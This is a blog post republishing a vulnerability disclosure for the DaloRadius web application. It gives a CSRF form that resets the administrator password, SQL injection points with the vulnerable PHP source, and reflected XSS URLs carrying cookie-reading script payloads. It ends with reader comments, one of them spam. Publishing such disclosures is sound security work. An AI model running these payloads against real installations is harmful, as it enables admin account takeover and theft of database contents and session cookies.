Hi , just browsing Sourceforge and see a script having more than 1 thousand downloads per week , so not bad to give it a pentest and found some stuff in it :)
Exploit Links
http://www.exploit-db.com/exploits/24849
http://1337day.com/exploit/20513
http://packetstormsecurity.com/files/120828/DaloRadius-CSRF-XSS-SQL-Injection.html
Exploit
Exploit Links
http://www.exploit-db.com/exploits/24849
http://1337day.com/exploit/20513
http://packetstormsecurity.com/files/120828/DaloRadius-CSRF-XSS-SQL-Injection.html
Exploit
-------------------------------------------------------------------------
# Software : DaloRadius SQLi / CSRF / XSS
# Author : Saadat Ullah , saadi_linux@rocketmail.com
# Author home : http://security-geeks.blogspot.com
# Date : 15/3/13
# Vendors : http://www.daloradius.com/
# Download Link : http://sourceforge.net/projects/daloradius/
-------------------------------------------------------------------------
+---+[ CSRF Change Admin Password ]+---+
DaloRadius Is not Using Any Security Tokens To Protect Againts CRSF.It is vuln to CRSF on All Locations.
Some OF them..
Change Admin Password
<form action="daloradius/config-operators-edit.php" method="post">
<input type="hidden" value="administrator" name="operator_username" />
<div class="tabber">
<div class="tabbertab" title="Operator Info">
<fieldset>
<h302></h302>
<br/>
<label for='operator_password' class='form'></label>
<input name='password' id='password'
type='hidden' value='radius1' tabindex=101 />
<br/>
<br/><br/>
<hr><br/>
<input type='submit' name='submit' value='Apply' class='button' />
Poc
Header
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:14.0) Gecko/20100101 Firefox/14.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://localhost/daloradius/config-operators-edit.php?operator_username=administrator
Cookie: PHPSESSID=5f528764d624db129645be2e9
Content-Type: application/x-www-form-urlencoded
Content-Length: 3540
Post Data:
operator_username=administrator&password=radius1&submit=Apply
+---+[ SQL Injection ]+---+
Their are multiple SQLI in the script some are..
http://localhost/daloradius/acct-ipaddress.php?orderBy=[SQLi]
http://localhost/daloradius/acct-ipaddress.php?ipaddress=[SQLi]
http://localhost/daloradius/acct-date.php?orderBy=[SQLi]
http://localhost/daloradius/acct-date.php?username=[SQLi] etc
Proof Of Concept
in acct-ipaddress.php
isset($_GET['orderBy']) ? $orderBy = $_GET['orderBy'] : $orderBy = "radacctid";
isset($_GET['orderType']) ? $orderType = $_GET['orderType'] : $orderType = "asc";
isset($_GET['ipaddress']) ? $ipaddress = $_GET['ipaddress'] : $ipaddress = "";
.
.
.
$sql = "SELECT ".$configValues['CONFIG_DB_TBL_RADACCT'].".RadAcctId, ".$configValues['CONFIG_DB_TBL_DALOHOTSPOTS'].".name as hotspot, ".$configValues['CONFIG_DB_TBL_RADACCT'].".UserName, radacct.FramedIPAddress, ".$configValues['CONFIG_DB_TBL_RADACCT'].".AcctStartTime, ".$configValues['CONFIG_DB_TBL_RADACCT'].".AcctStopTime, radacct.AcctSessionTime, ".$configValues['CONFIG_DB_TBL_RADACCT'].".AcctInputOctets, ".$configValues['CONFIG_DB_TBL_RADACCT'].".AcctOutputOctets, ".$configValues['CONFIG_DB_TBL_RADACCT'].".AcctTerminateCause, ".$configValues['CONFIG_DB_TBL_RADACCT'].".NASIPAddress FROM ".$configValues['CONFIG_DB_TBL_RADACCT']." LEFT JOIN ".$configValues['CONFIG_DB_TBL_DALOHOTSPOTS']." ON ".$configValues['CONFIG_DB_TBL_RADACCT'].".calledstationid = ".$configValues['CONFIG_DB_TBL_DALOHOTSPOTS'].".mac WHERE FramedIPAddress='$ipaddress';";
In acct-date.php
if ( (isset($_GET['username'])) && ($_GET['username']) ) {
$username = $_GET['username'];
$sql = "SELECT ".$configValues['CONFIG_DB_TBL_RADACCT'].".RadAcctId, ".$configValues['CONFIG_DB_TBL_DALOHOTSPOTS'].".name as hotspot, ".$configValues['CONFIG_DB_TBL_RADACCT'].".UserName, ".$configValues['CONFIG_DB_TBL_RADACCT'].".FramedIPAddress, ".$configValues['CONFIG_DB_TBL_RADACCT'].".AcctStartTime, ".$configValues['CONFIG_DB_TBL_RADACCT'].".AcctStopTime, ".$configValues['CONFIG_DB_TBL_RADACCT'].".AcctSessionTime, ".$configValues['CONFIG_DB_TBL_RADACCT'].".AcctInputOctets, ".$configValues['CONFIG_DB_TBL_RADACCT'].".AcctOutputOctets, ".$configValues['CONFIG_DB_TBL_RADACCT'].".AcctTerminateCause, ".$configValues['CONFIG_DB_TBL_RADACCT'].".NASIPAddress FROM ".$configValues['CONFIG_DB_TBL_RADACCT']." LEFT JOIN ".$configValues['CONFIG_DB_TBL_DALOHOTSPOTS']." ON ".$configValues['CONFIG_DB_TBL_RADACCT'].".calledstationid = ".$configValues['CONFIG_DB_TBL_DALOHOTSPOTS'].".mac WHERE AcctStartTime>'$startdate' and AcctStartTime<'$enddate' and UserName like '$username';";
+---+[ XSS ]+---+
http://localhost/daloradius/rep-logs-daloradius.php?daloradiusLineCount=50&daloradiusFilter=<script>alert(document.cookie);</script>
http://localhost/daloradius/mng-search.php?username=<script>alert(document.cookie);</script>
#Independent Pakistani Security Researcher
2 comments:
nice finding , it will be more good if you provide patch's for these bugs...
It's amazing, I'm glad I read it
London Escorts
Post a Comment